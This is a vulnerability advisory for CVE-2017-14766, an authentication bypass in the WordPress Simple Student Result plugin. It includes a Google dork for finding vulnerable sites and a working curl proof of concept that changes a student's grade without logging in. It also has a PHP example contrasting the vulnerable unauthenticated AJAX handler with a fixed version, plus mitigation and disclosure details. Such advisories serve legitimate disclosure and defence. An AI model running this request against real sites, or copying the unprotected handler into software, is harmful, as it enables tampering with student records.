Exploit Title: Simple Student Result < 1.6.4 - Auth Bypass
Google Dork: inurl:wp-content/plugins/simple-student-result
Date: 21-Sep-17
Exploit Author: Benjamin Lim
Vendor Homepage: https://ssr.saadamin.com/
Software Link: https://wordpress.org/plugins/simple-student-result/
Version: < 1.6.4
Tested on: Kali Linux 2.0
CVE : CVE-2017-14766
1. Product & Service Introduction:
Simple Student Result is a WordPress plugin for managing student results. Administrators can create/update/delete results, while unauthenticated users can look up results by providing a student id number. At the time of writing, the plugin has been downloaded 12,000 times and has 700+ active installs.
2. Technical Details & Description:
Authentication bypass vulnerability in the WordPress Simple Student Result plugin 1.6.3 (and earlier) allows unauthenticated attackers to update or delete student records with knowledge of only the student id number. The fn_ssr_add_st_submit() and fn_ssr_del_st_submit() functions in functions.php, which handle the plugin's admin-ajax.php actions, did not check whether the current request was made by an authorized user (there is no capability check on the caller), so any unauthenticated user could modify the records. The proof of concept below reaches the handler with no WordPress session at all, which means the action is exposed through the unauthenticated wp_ajax_nopriv_ hook rather than only the logged-in wp_ajax_ hook.
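The following is an added, illustrative example of the handler pattern described above and of the fix a plugin author would apply; it is not the plugin's own code. The hook and function names follow the advisory, but the table name, column names, script handle and nonce action are assumptions made for the example.

```php
<?php
/*
 * Illustrative example only (not the Simple Student Result source).
 * Shows the vulnerable admin-ajax handler shape and a hardened version.
 */

// --- Vulnerable pattern ---------------------------------------------------
// Registering the handler on the nopriv hook makes it callable with no session
// at all, and the function itself never asks who is calling.
add_action( 'wp_ajax_ssr_add_st_submit',        'fn_ssr_add_st_submit_vuln' );
add_action( 'wp_ajax_nopriv_ssr_add_st_submit', 'fn_ssr_add_st_submit_vuln' );

function fn_ssr_add_st_submit_vuln() {
    global $wpdb;
    // No capability check and no nonce: anyone who knows the student id
    // (rid) can overwrite the row, exactly as the curl PoC does.
    $wpdb->update(
        $wpdb->prefix . 'ssr_results',                        // assumed table
        array( 'cgpa' => sanitize_text_field( $_POST['stcgpa'] ) ),
        array( 'student_id' => intval( $_POST['rid'] ) )      // assumed column
    );
    wp_send_json_success();
}

// --- Hardened pattern -----------------------------------------------------
// 1. Only the authenticated hook: unauthenticated POSTs to admin-ajax.php
//    never reach the function.
add_action( 'wp_ajax_ssr_add_st_submit', 'fn_ssr_add_st_submit_fixed' );

function fn_ssr_add_st_submit_fixed() {
    global $wpdb;

    // 2. Nonce check: blocks a CSRF that rides on an administrator's browser.
    //    Dies with HTTP 403 if the 'ssr_nonce' field is missing or invalid.
    check_ajax_referer( 'ssr_add_st', 'ssr_nonce' );   // assumed action name

    // 3. Capability check: dropping nopriv is not enough on its own, because
    //    any logged-in account (even a subscriber) can fire wp_ajax_ actions.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    $wpdb->update(
        $wpdb->prefix . 'ssr_results',
        array( 'cgpa' => sanitize_text_field( $_POST['stcgpa'] ) ),
        array( 'student_id' => intval( $_POST['rid'] ) )
    );
    wp_send_json_success();
}

// The admin page must hand the nonce to its own JavaScript so the legitimate
// form still passes step 2. 'ssr-admin' is an assumed, already-registered
// script handle.
function ssr_enqueue_admin_nonce() {
    wp_localize_script( 'ssr-admin', 'ssrAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'ssr_add_st' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'ssr_enqueue_admin_nonce' );
```

The delete handler (fn_ssr_del_st_submit) needs the same three changes. The order matters little for correctness, but putting the nonce check first means a forged request is rejected before any database object is touched.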
3. Proof of Concept (PoC):
To update student id 123's CGPA to 5.0:
curl -i -s -k -X 'POST' \
  -H 'User-Agent: Mozilla/5.0' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://localhost/wp-admin/admin.php?page=ssr_add_results' \
  --data-binary 'action=ssr_add_st_submit&rid=123&rn=456&stn=john&stfn=smith&stpy=2017&stcgpa=5.00&stsub=Subject+3&stpy2=01011990&stpy3=male&stpy4=address&stpy5=smith&stpy6=extra1&stpy7=extra2&upload_image=' \
  'https://localhost/wp-admin/admin-ajax.php'
4. Mitigation
Update to version 1.6.4 or later.
5. Disclosure Timeline
2017/09/20 Vendor contacted
2017/09/20 Vendor responded
2017/09/21 Update released
2017/09/21 Advisory released to the public
6. Credits & Authors:
Benjamin Lim - [https://limbenjamin.com]